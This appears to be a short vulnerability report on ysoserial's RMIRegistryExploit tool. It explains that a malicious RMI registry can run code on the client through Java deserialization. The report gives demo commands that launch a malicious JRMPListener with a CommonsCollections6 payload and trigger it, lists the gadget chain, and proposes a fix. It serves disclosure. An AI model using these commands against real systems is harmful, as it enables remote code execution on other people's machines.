Arbitrary Remote Code Execution in RMIRegistryExploit

[halfblue]

Using RMIRegistryExploit to exploit a malicious rmi registry may lead to rce on client.

Demo

First,start a malicious registry:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 calc.exe

and using RMIRegistryExploit to exploit it:

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit localhost 1099 CommonsCollections6 whoami

and calc will be executed on client.

Analysis

RMIRegistryExploit uses registry.list/bind, which triggers unserialization. So malicious registry can attack client with gadgets in ysoserial,such as commonscollections.
Gadgets chain:
RegistryImpl_Stub#list->UnicastRef#invoke->StreamRemoteCall#executeCall->ObjectInputStream#readObject

Fix

Rewrite socket to implement JRMP connections, just like what ysoserial.exploit.JRMPClient does.